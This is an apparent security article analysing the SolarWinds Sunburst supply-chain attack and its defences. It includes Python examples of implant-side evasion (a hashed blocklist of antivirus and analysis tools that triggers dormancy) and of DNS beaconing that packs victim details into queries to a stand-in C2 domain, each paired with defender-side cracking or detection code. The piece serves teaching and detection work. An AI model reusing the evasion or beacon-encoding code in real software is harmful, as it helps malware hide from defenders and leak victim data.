The SolarWinds Sunburst attack is a jackpot for anyone looking for a textbook example of an elaborate, stealthy, probably state-sponsored, meticulously planned, and patiently executed intrusion. Not only did the attackers implant an advanced backdoor into systems used by Fortune 500 companies and government agencies, they did it by tampering with the build of an official software update so that the backdoor shipped inside a component legitimately signed by the vendor. The trojanized update was then downloaded by up to 18,000 customers between March and June 2020.
SolarWinds Sunburst attack reveals infinite attack surface
While the software made famous for all the wrong reasons is a commercial network monitoring product from SolarWinds called Orion, the underlying problem is broader: supply-chain, or third-party, attacks are becoming a very serious problem. Whether a component is open source or a vendor's signed release, there is a tradeoff that can't be ignored: you take on its weaknesses along with its features. Any software, service, or app you pull in from the Internet needs to be thoroughly vetted for vulnerabilities, and its update channel treated as part of your own attack surface, before you add it to your environment.
Today almost every organization in the world uses third-party hardware and software, which in turn are often assembled from yet more third-party components. If you imagine a tree with each device or application branching out into its constituent components, on-premises and in the cloud, that is how big the attack surface of a typical enterprise is today. Sunburst is not an isolated case: not long before it, GE suffered a damaging data breach through a third-party service provider, and Marriott International suffered two breaches in as many years.
So, if supply-chain attacks have become commonplace, what's so special about the Sunburst attack on SolarWinds? For starters, early reporting pointed to as much as four years of preparation, including the registration of plausible-looking internet domains for command and control and, crucially, a backdoor that carried a valid SolarWinds code signature. Rather than tampering with a finished installer, the attackers inserted the Sunburst code into the Orion build process, so the resulting DLL was compiled and signed by SolarWinds' own pipeline and then distributed through the official update server. While SolarWinds estimates that fewer than 18,000 customers downloaded the trojanized updates, its published customer list has included the Office of the President of the United States.
Once installed, the backdoor deliberately stays dormant for up to about two weeks, which pushes its first malicious activity well past the window in which defenders usually scrutinize a new update. It then gathers information, runs operator-issued commands (called jobs in the malware's own terminology), and checks in with its command-and-control (C2) servers. The information gathered includes the domain name, network interfaces, running processes and services, and installed drivers; the jobs range from transferring and executing files to rebooting and disabling systems. The order matters: the backdoor runs its environment checks first, and only if they pass does it contact its C2 infrastructure for further instructions and, from there, hand the operators control of the infected host.
Super stealth mode
To call this attack complex would be an understatement; there are layers of complexity that are still being investigated. Summarized, Sunburst avoids detection by not doing the things that make malware detectable. It adds no conspicuous bulk to the .NET DLL it was planted in, it doesn't start working immediately, it communicates slowly and infrequently, it contains no x86 shellcode, and it refuses to run on systems where drivers, processes, or services associated with anti-malware or analysis tools are present. It does this by checking the collected system information against a blocklist that covers domain names as well as drivers, processes, and services. Tellingly, the blocklist is stored as hashes rather than names, so a reverse engineer cannot simply read off what the malware is avoiding; each hash has to be cracked against a list of candidate names first.
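The hashed-blocklist idea is worth seeing in code, from both sides. The example below is added here and is not SolarWinds' or the malware's code: it hashes process names with 64-bit FNV-1a (the family of hash Sunburst used) and XORs the result with a key, so the implant ships only opaque numbers; a defender then recovers the names by hashing a candidate list and matching. The XOR key and the blocked names are illustrative choices for this example, not the real malware's values.

```python
# Added example: a hash-based process blocklist and the defender-side dictionary attack on it.

FNV_OFFSET_64 = 0xCBF29CE484222325
FNV_PRIME_64 = 0x100000001B3
MASK_64 = (1 << 64) - 1
# Illustrative XOR key (assumption for this example; not the real malware's constant).
# XORing the hash means a stock FNV-1a rainbow table will not match the stored values.
XOR_KEY = 0x5A17C3D9E8B24F01


def fnv1a64(data: bytes) -> int:
    """Plain 64-bit FNV-1a: XOR each byte into the state, then multiply by the prime."""
    h = FNV_OFFSET_64
    for b in data:
        h ^= b
        h = (h * FNV_PRIME_64) & MASK_64
    return h


def obfuscated_hash(name: str) -> int:
    """Hash used for blocklist entries: case-folded name, FNV-1a, then XOR with the key."""
    return fnv1a64(name.lower().encode("utf-8")) ^ XOR_KEY


# Constructed list of names the implant wants to avoid (security and analysis tooling).
# A real implant would ship only the BLOCKLIST hashes below, never this readable list.
BLOCKED_NAMES = ["mcshield", "msmpeng", "procmon", "wireshark", "windbg", "x64dbg"]
BLOCKLIST = frozenset(obfuscated_hash(n) for n in BLOCKED_NAMES)


def should_stay_dormant(running_processes) -> bool:
    """Implant side: hash every running process name and stop if any hit the blocklist."""
    return any(obfuscated_hash(p) in BLOCKLIST for p in running_processes)


def recover_names(hashes, candidates):
    """Defender side: crack the stored hashes by hashing a dictionary of candidate names.

    Returns {hash: name} with None where no candidate matched, which is exactly the
    position analysts were in with Sunburst until enough names had been guessed.
    """
    lookup = {obfuscated_hash(c): c for c in candidates}
    return {h: lookup.get(h) for h in hashes}


if __name__ == "__main__":
    # Constructed process list for a host running Microsoft Defender (MsMpEng).
    print(should_stay_dormant(["explorer", "svchost", "MsMpEng"]))
    for h, name in recover_names(sorted(BLOCKLIST), BLOCKED_NAMES + ["explorer"]).items():
        print(f"{h:016x} -> {name}")
```

The defender's dictionary attack works because the input space is tiny: process and service names are short, well-known strings, so hashing a few thousand candidates recovers most entries. The lesson for detection engineering is that hashed indicators slow analysis down but do not hide intent for long.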
Another trick Sunburst pulls off is contacting its C2 infrastructure with what looks like an ordinary DNS lookup but is in fact a query whose subdomain encodes information about the infected system, the victim's internal domain name among it; the attacker-controlled DNS server answers with records whose content steers the implant to its next stage. After that, traffic between the backdoor and its C2 servers mimics SolarWinds' own API traffic, specifically the Orion Improvement Program (OIP) protocol, so the HTTP exchanges look like legitimate product telemetry. The attackers also authenticated all lateral movement with valid user credentials, believed to have been stolen, so that their activity blended in with normal administrative work.
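To make the DNS beaconing concrete, here is an added example (not SolarWinds' or the malware's code) that shows both halves: an implant packing a machine identifier and the victim's domain into a DNS label, and a resolver-log detector flagging the long, high-entropy labels such beacons produce. The parent domain, log format, and log lines are constructed for the example; standard base32 stands in for Sunburst's custom encoding alphabet.

```python
# Added example: DNS-label beacon encoding and a resolver-log detector for it.
import base64
import collections
import math

# Constructed parent domain (assumption for this example; not the real C2 domain).
C2_PARENT = "cloud-telemetry.test"


def encode_beacon(machine_id: str, victim_domain: str, parent: str = C2_PARENT) -> str:
    """Implant side: pack victim details into the first label of a query name."""
    payload = f"{machine_id}:{victim_domain}".encode("utf-8")
    label = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    if len(label) > 63:
        raise ValueError("a DNS label is at most 63 octets; real implants chunk across labels")
    return f"{label}.{parent}"


def decode_beacon(qname: str, parent: str = C2_PARENT) -> tuple[str, str]:
    """Attacker's authoritative server: unpack the label back into (machine_id, domain)."""
    label = qname[: -len(parent) - 1].upper()
    label += "=" * (-len(label) % 8)  # restore the base32 padding stripped on encode
    machine_id, victim_domain = base64.b32decode(label).decode("utf-8").split(":", 1)
    return machine_id, victim_domain


def shannon_entropy(text: str) -> float:
    """Bits per character; encoded payloads score far higher than hostnames like 'www'."""
    counts = collections.Counter(text)
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def suspicious_queries(log_lines, min_len: int = 20, min_entropy: float = 3.5):
    """Defender side: flag query names whose first label is long and high-entropy.

    Each log line is '<timestamp> <client_ip> <qname>' (constructed format for this example).
    """
    flagged = []
    for line in log_lines:
        qname = line.split()[-1].rstrip(".")
        first_label = qname.split(".")[0]
        if len(first_label) >= min_len and shannon_entropy(first_label) >= min_entropy:
            flagged.append(qname)
    return flagged


# Constructed resolver log: three ordinary lookups and one beacon from the victim host.
SAMPLE_LOG = [
    "2020-06-02T10:01:03Z 10.0.5.21 www.solarwinds.test.",
    "2020-06-02T10:01:09Z 10.0.5.21 time.windows.test.",
    f"2020-06-02T10:14:55Z 10.0.5.21 {encode_beacon('a1b2c3d4', 'corp.victim.test')}.",
    "2020-06-02T10:15:02Z 10.0.5.40 mail.corp.victim.test.",
]

if __name__ == "__main__":
    for qname in suspicious_queries(SAMPLE_LOG):
        print("suspicious:", qname, "->", decode_beacon(qname))
```

Two caveats a practitioner should keep in mind. Length-and-entropy heuristics will also fire on legitimate CDN and telemetry hostnames, so in practice they are combined with the query rate per host and with whether the parent domain is newly registered. And Sunburst kept its beacon rate very low, which is why looking at individual queries is weaker than grouping them by parent domain over days.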
As an example of the layers that exist here, researchers also uncovered a web shell called Supernova on Orion servers, now believed to be the work of a different actor that exploited Orion directly rather than through the trojanized update, as well as a previously unseen memory-only dropper dubbed Teardrop that delivered a Cobalt Strike Beacon payload. Yet another component connected to the Sunburst campaign, a second Beacon loader dubbed Raindrop, has more recently been identified.
Picking up the pieces
The first thing to realize about an attack like the SolarWinds Sunburst incident is that the defenders have the odds stacked against them. They have to be alert and prepared all the time, while the attackers are at liberty to plan for years and strike whenever they choose. And while we have seen plenty of third-party attacks of late, this one has truly woken the world up to the danger of supply-chain attacks and permanently changed the boundaries of global IT security.
For attackers, it's about finding the weakest link in your chain of vendors, while security teams need to go through every piece of hardware and software bought from a third party. Hardware implants can be even harder to detect. The best-known example is a 2018 press report claiming that a rice-grain-sized backdoor chip had been found on server motherboards used in U.S. Department of Defense datacenters, the CIA's drone operations, and the onboard networks of Navy warships, supposedly detected only when a third party hired to scrutinize the boards noticed a component that wasn't part of the original design. That report was flatly denied by the companies named and has never been independently confirmed, which illustrates the other half of the problem: hardware-level claims are hard to verify either way, and few organizations have the capability to check a board against its reference design.
The good news is that security teams have an advantage, too, if they make use of it. They can study the battleground long before the proverbial battle, because they have complete access to their own environments well in advance of any attack, which is a significant edge. While attackers are planning, security teams should be actively mapping their own attack surfaces so they know where the weakest links are before anyone else does. Chaos engineering, extended from reliability faults to adversarial ones through red-team exercises and attack-simulation drills, is a good way to find your own weaknesses and vulnerabilities first.
Security teams, when not dealing with breaches, need to be constantly testing their own defenses and proactively mapping every organizational asset and endpoint exposed to the Internet, including all third-party products. A good way to screen out software vendors that can't meet your requirements is to publish a standard of security practices, covering how they protect their build and code-signing infrastructure as well as their product, that every vendor must satisfy to qualify for purchase. Contextually aware security controls and user behavior analytics are also effective at catching malware whose behavior departs from the norm, as we saw in the Sunburst attack, where the tell was a trusted application quietly doing things it had never done before.
SolarWinds Sunburst attack proves malicious is the new norm
While the SolarWinds Sunburst attack has every security team digging around to check whether similar backdoors exist in their environments, the fact that many are probably still undetected in the wild is a sobering thought. Organizations can no longer make assumptions about network traffic based on the protocol it speaks, and every action needs to be treated as guilty until proven innocent, even if it comes from a trusted, signed application. Most importantly, organizations need to stop growing faster than their security teams can keep up with, and if need be, slow down so security can catch up. Lastly, focus on proactive security that is relevant to the current threat landscape.